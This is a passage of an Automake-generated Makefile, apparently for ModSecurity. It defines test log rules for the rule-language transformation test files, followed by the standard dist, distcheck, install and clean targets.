@p='test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json'; \ b='test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/base64Decode.json.log: test/test-cases/secrules-language-tests/transformations/base64Decode.json @p='test/test-cases/secrules-language-tests/transformations/base64Decode.json'; \ b='test/test-cases/secrules-language-tests/transformations/base64Decode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/base64Encode.json.log: test/test-cases/secrules-language-tests/transformations/base64Encode.json @p='test/test-cases/secrules-language-tests/transformations/base64Encode.json'; \ b='test/test-cases/secrules-language-tests/transformations/base64Encode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/cmdLine.json.log: test/test-cases/secrules-language-tests/transformations/cmdLine.json @p='test/test-cases/secrules-language-tests/transformations/cmdLine.json'; \ b='test/test-cases/secrules-language-tests/transformations/cmdLine.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/compressWhitespace.json.log: test/test-cases/secrules-language-tests/transformations/compressWhitespace.json @p='test/test-cases/secrules-language-tests/transformations/compressWhitespace.json'; \ b='test/test-cases/secrules-language-tests/transformations/compressWhitespace.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/cssDecode.json.log: test/test-cases/secrules-language-tests/transformations/cssDecode.json @p='test/test-cases/secrules-language-tests/transformations/cssDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/cssDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json.log: test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json @p='test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/hexDecode.json.log: test/test-cases/secrules-language-tests/transformations/hexDecode.json @p='test/test-cases/secrules-language-tests/transformations/hexDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/hexDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/hexEncode.json.log: test/test-cases/secrules-language-tests/transformations/hexEncode.json @p='test/test-cases/secrules-language-tests/transformations/hexEncode.json'; \ b='test/test-cases/secrules-language-tests/transformations/hexEncode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json.log: test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json @p='test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/jsDecode.json.log: test/test-cases/secrules-language-tests/transformations/jsDecode.json @p='test/test-cases/secrules-language-tests/transformations/jsDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/jsDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/length.json.log: test/test-cases/secrules-language-tests/transformations/length.json @p='test/test-cases/secrules-language-tests/transformations/length.json'; \ b='test/test-cases/secrules-language-tests/transformations/length.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/lowercase.json.log: test/test-cases/secrules-language-tests/transformations/lowercase.json @p='test/test-cases/secrules-language-tests/transformations/lowercase.json'; \ b='test/test-cases/secrules-language-tests/transformations/lowercase.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/md5.json.log: test/test-cases/secrules-language-tests/transformations/md5.json @p='test/test-cases/secrules-language-tests/transformations/md5.json'; \ b='test/test-cases/secrules-language-tests/transformations/md5.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/normalisePath.json.log: test/test-cases/secrules-language-tests/transformations/normalisePath.json @p='test/test-cases/secrules-language-tests/transformations/normalisePath.json'; \ b='test/test-cases/secrules-language-tests/transformations/normalisePath.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/normalisePathWin.json.log: test/test-cases/secrules-language-tests/transformations/normalisePathWin.json @p='test/test-cases/secrules-language-tests/transformations/normalisePathWin.json'; \ b='test/test-cases/secrules-language-tests/transformations/normalisePathWin.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/parityEven7bit.json.log: test/test-cases/secrules-language-tests/transformations/parityEven7bit.json @p='test/test-cases/secrules-language-tests/transformations/parityEven7bit.json'; \ b='test/test-cases/secrules-language-tests/transformations/parityEven7bit.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json.log: test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json @p='test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json'; \ b='test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/parityZero7bit.json.log: test/test-cases/secrules-language-tests/transformations/parityZero7bit.json @p='test/test-cases/secrules-language-tests/transformations/parityZero7bit.json'; \ b='test/test-cases/secrules-language-tests/transformations/parityZero7bit.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json.log: test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json @p='test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json'; \ b='test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/removeComments.json.log: test/test-cases/secrules-language-tests/transformations/removeComments.json @p='test/test-cases/secrules-language-tests/transformations/removeComments.json'; \ b='test/test-cases/secrules-language-tests/transformations/removeComments.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/removeNulls.json.log: test/test-cases/secrules-language-tests/transformations/removeNulls.json @p='test/test-cases/secrules-language-tests/transformations/removeNulls.json'; \ b='test/test-cases/secrules-language-tests/transformations/removeNulls.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/removeWhitespace.json.log: test/test-cases/secrules-language-tests/transformations/removeWhitespace.json @p='test/test-cases/secrules-language-tests/transformations/removeWhitespace.json'; \ b='test/test-cases/secrules-language-tests/transformations/removeWhitespace.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/replaceComments.json.log: test/test-cases/secrules-language-tests/transformations/replaceComments.json @p='test/test-cases/secrules-language-tests/transformations/replaceComments.json'; \ b='test/test-cases/secrules-language-tests/transformations/replaceComments.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/replaceNulls.json.log: test/test-cases/secrules-language-tests/transformations/replaceNulls.json @p='test/test-cases/secrules-language-tests/transformations/replaceNulls.json'; \ b='test/test-cases/secrules-language-tests/transformations/replaceNulls.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/sha1.json.log: test/test-cases/secrules-language-tests/transformations/sha1.json @p='test/test-cases/secrules-language-tests/transformations/sha1.json'; \ b='test/test-cases/secrules-language-tests/transformations/sha1.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json.log: test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json @p='test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/sqlHexDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/trim.json.log: test/test-cases/secrules-language-tests/transformations/trim.json @p='test/test-cases/secrules-language-tests/transformations/trim.json'; \ b='test/test-cases/secrules-language-tests/transformations/trim.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/trimLeft.json.log: test/test-cases/secrules-language-tests/transformations/trimLeft.json @p='test/test-cases/secrules-language-tests/transformations/trimLeft.json'; \ b='test/test-cases/secrules-language-tests/transformations/trimLeft.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/trimRight.json.log: test/test-cases/secrules-language-tests/transformations/trimRight.json @p='test/test-cases/secrules-language-tests/transformations/trimRight.json'; \ b='test/test-cases/secrules-language-tests/transformations/trimRight.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/urlDecode.json.log: test/test-cases/secrules-language-tests/transformations/urlDecode.json @p='test/test-cases/secrules-language-tests/transformations/urlDecode.json'; \ b='test/test-cases/secrules-language-tests/transformations/urlDecode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json.log: test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json @p='test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json'; \ b='test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/urlEncode.json.log: test/test-cases/secrules-language-tests/transformations/urlEncode.json @p='test/test-cases/secrules-language-tests/transformations/urlEncode.json'; \ b='test/test-cases/secrules-language-tests/transformations/urlEncode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json.log: test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json @p='test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json'; \ b='test/test-cases/secrules-language-tests/transformations/utf8toUnicode.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) .test.log: @p='$<'; \ $(am__set_b); \ $(am__check_pre) $(TEST_LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_TEST_LOG_DRIVER_FLAGS) $(TEST_LOG_DRIVER_FLAGS) -- $(TEST_LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) @am__EXEEXT_TRUE@.test$(EXEEXT).log: @am__EXEEXT_TRUE@ @p='$<'; \ @am__EXEEXT_TRUE@ $(am__set_b); \ @am__EXEEXT_TRUE@ $(am__check_pre) $(TEST_LOG_DRIVER) --test-name "$$f" \ @am__EXEEXT_TRUE@ --log-file $$b.log --trs-file $$b.trs \ @am__EXEEXT_TRUE@ $(am__common_driver_flags) $(AM_TEST_LOG_DRIVER_FLAGS) $(TEST_LOG_DRIVER_FLAGS) -- $(TEST_LOG_COMPILE) \ @am__EXEEXT_TRUE@ "$$tst" $(AM_TESTS_FD_REDIRECT) distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) $(am__remove_distdir) test -d "$(distdir)" || mkdir "$(distdir)" @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ $(am__make_dryrun) \ || test -d "$(distdir)/$$subdir" \ || $(MKDIR_P) "$(distdir)/$$subdir" \ || exit 1; \ dir1=$$subdir; dir2="$(distdir)/$$subdir"; \ $(am__relativize); \ new_distdir=$$reldir; \ dir1=$$subdir; dir2="$(top_distdir)"; \ $(am__relativize); \ new_top_distdir=$$reldir; \ echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \ echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \ ($(am__cd) $$subdir && \ $(MAKE) $(AM_MAKEFLAGS) \ top_distdir="$$new_top_distdir" \ distdir="$$new_distdir" \ am__remove_distdir=: \ am__skip_length_check=: \ am__skip_mode_fix=: \ distdir) \ || exit 1; \ fi; \ done -test -n "$(am__skip_mode_fix)" \ || find "$(distdir)" -type d ! -perm -755 \ -exec chmod u+rwx,go+rx {} \; -o \ ! -type d ! -perm -444 -links 1 -exec chmod a+r {} \; -o \ ! -type d ! -perm -400 -exec chmod a+r {} \; -o \ ! -type d ! -perm -444 -exec $(install_sh) -c -m a+r {} {} \; \ || chmod -R a+r "$(distdir)" dist-gzip: distdir tardir=$(distdir) && $(am__tar) | eval GZIP= gzip $(GZIP_ENV) -c >$(distdir).tar.gz $(am__post_remove_distdir) dist-bzip2: distdir tardir=$(distdir) && $(am__tar) | BZIP2=$${BZIP2--9} bzip2 -c >$(distdir).tar.bz2 $(am__post_remove_distdir) dist-lzip: distdir tardir=$(distdir) && $(am__tar) | lzip -c $${LZIP_OPT--9} >$(distdir).tar.lz $(am__post_remove_distdir) dist-xz: distdir tardir=$(distdir) && $(am__tar) | XZ_OPT=$${XZ_OPT--e} xz -c >$(distdir).tar.xz $(am__post_remove_distdir) dist-tarZ: distdir @echo WARNING: "Support for distribution archives compressed with" \ "legacy program 'compress' is deprecated." >&2 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2 tardir=$(distdir) && $(am__tar) | compress -c >$(distdir).tar.Z $(am__post_remove_distdir) dist-shar: distdir @echo WARNING: "Support for shar distribution archives is" \ "deprecated." >&2 @echo WARNING: "It will be removed altogether in Automake 2.0" >&2 shar $(distdir) | eval GZIP= gzip $(GZIP_ENV) -c >$(distdir).shar.gz $(am__post_remove_distdir) dist-zip: distdir -rm -f $(distdir).zip zip -rq $(distdir).zip $(distdir) $(am__post_remove_distdir) dist dist-all: $(MAKE) $(AM_MAKEFLAGS) $(DIST_TARGETS) am__post_remove_distdir='@:' $(am__post_remove_distdir) # This target untars the dist file and tries a VPATH configuration. Then # it guarantees that the distribution is self-contained by making another # tarfile. distcheck: dist case '$(DIST_ARCHIVES)' in \ *.tar.gz*) \ eval GZIP= gzip $(GZIP_ENV) -dc $(distdir).tar.gz | $(am__untar) ;;\ *.tar.bz2*) \ bzip2 -dc $(distdir).tar.bz2 | $(am__untar) ;;\ *.tar.lz*) \ lzip -dc $(distdir).tar.lz | $(am__untar) ;;\ *.tar.xz*) \ xz -dc $(distdir).tar.xz | $(am__untar) ;;\ *.tar.Z*) \ uncompress -c $(distdir).tar.Z | $(am__untar) ;;\ *.shar.gz*) \ eval GZIP= gzip $(GZIP_ENV) -dc $(distdir).shar.gz | unshar ;;\ *.zip*) \ unzip $(distdir).zip ;;\ esac chmod -R a-w $(distdir) chmod u+w $(distdir) mkdir $(distdir)/_build $(distdir)/_build/sub $(distdir)/_inst chmod a-w $(distdir) test -d $(distdir)/_build || exit 0; \ dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \ && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \ && am__cwd=`pwd` \ && $(am__cd) $(distdir)/_build/sub \ && ../../configure \ $(AM_DISTCHECK_CONFIGURE_FLAGS) \ $(DISTCHECK_CONFIGURE_FLAGS) \ --srcdir=../.. --prefix="$$dc_install_base" \ && $(MAKE) $(AM_MAKEFLAGS) \ && $(MAKE) $(AM_MAKEFLAGS) dvi \ && $(MAKE) $(AM_MAKEFLAGS) check \ && $(MAKE) $(AM_MAKEFLAGS) install \ && $(MAKE) $(AM_MAKEFLAGS) installcheck \ && $(MAKE) $(AM_MAKEFLAGS) uninstall \ && $(MAKE) $(AM_MAKEFLAGS) distuninstallcheck_dir="$$dc_install_base" \ distuninstallcheck \ && chmod -R a-w "$$dc_install_base" \ && ({ \ (cd ../.. && umask 077 && mkdir "$$dc_destdir") \ && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" install \ && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" uninstall \ && $(MAKE) $(AM_MAKEFLAGS) DESTDIR="$$dc_destdir" \ distuninstallcheck_dir="$$dc_destdir" distuninstallcheck; \ } || { rm -rf "$$dc_destdir"; exit 1; }) \ && rm -rf "$$dc_destdir" \ && $(MAKE) $(AM_MAKEFLAGS) dist \ && rm -rf $(DIST_ARCHIVES) \ && $(MAKE) $(AM_MAKEFLAGS) distcleancheck \ && cd "$$am__cwd" \ || exit 1 $(am__post_remove_distdir) @(echo "$(distdir) archives ready for distribution: "; \ list='$(DIST_ARCHIVES)'; for i in $$list; do echo $$i; done) | \ sed -e 1h -e 1s/./=/g -e 1p -e 1x -e '$$p' -e '$$x' distuninstallcheck: @test -n '$(distuninstallcheck_dir)' || { \ echo 'ERROR: trying to run $@ with an empty' \ '$$(distuninstallcheck_dir)' >&2; \ exit 1; \ }; \ $(am__cd) '$(distuninstallcheck_dir)' || { \ echo 'ERROR: cannot chdir into $(distuninstallcheck_dir)' >&2; \ exit 1; \ }; \ test `$(am__distuninstallcheck_listfiles) | wc -l` -eq 0 \ || { echo "ERROR: files left after uninstall:" ; \ if test -n "$(DESTDIR)"; then \ echo " (check DESTDIR support)"; \ fi ; \ $(distuninstallcheck_listfiles) ; \ exit 1; } >&2 distcleancheck: distclean @if test '$(srcdir)' = . ; then \ echo "ERROR: distcleancheck can only run from a VPATH build" ; \ exit 1 ; \ fi @test `$(distcleancheck_listfiles) | wc -l` -eq 0 \ || { echo "ERROR: files left in build directory after distclean:" ; \ $(distcleancheck_listfiles) ; \ exit 1; } >&2 check-am: all-am $(MAKE) $(AM_MAKEFLAGS) check-TESTS check: check-recursive all-am: Makefile $(DATA) installdirs: installdirs-recursive installdirs-am: for dir in "$(DESTDIR)$(pkgconfigdir)"; do \ test -z "$$dir" || $(MKDIR_P) "$$dir"; \ done install: install-recursive install-exec: install-exec-recursive install-data: install-data-recursive uninstall: uninstall-recursive install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-recursive install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: -test -z "$(TEST_LOGS)" || rm -f $(TEST_LOGS) -test -z "$(TEST_LOGS:.log=.trs)" || rm -f $(TEST_LOGS:.log=.trs) -test -z "$(TEST_SUITE_LOG)" || rm -f $(TEST_SUITE_LOG) clean-generic: -test -z "$(CLEANFILES)" || rm -f $(CLEANFILES) distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-recursive clean-am: clean-generic clean-libtool mostlyclean-am distclean: distclean-recursive -rm -f $(am__CONFIG_DISTCLEAN_FILES) -rm -f Makefile distclean-am: clean-am distclean-generic distclean-libtool \ distclean-tags dvi: dvi-recursive dvi-am: html: html-recursive html-am: info: info-recursive info-am: install-data-am: install-pkgconfigDATA install-dvi: install-dvi-recursive install-dvi-am: install-exec-am: install-html: install-html-recursive install-html-am: install-info: install-info-recursive install-info-am: install-man: install-pdf: install-pdf-recursive install-pdf-am: install-ps: install-ps-recursive install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-recursive -rm -f $(am__CONFIG_DISTCLEAN_FILES) -rm -rf $(top_srcdir)/autom4te.cache -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-recursive mostlyclean-am: 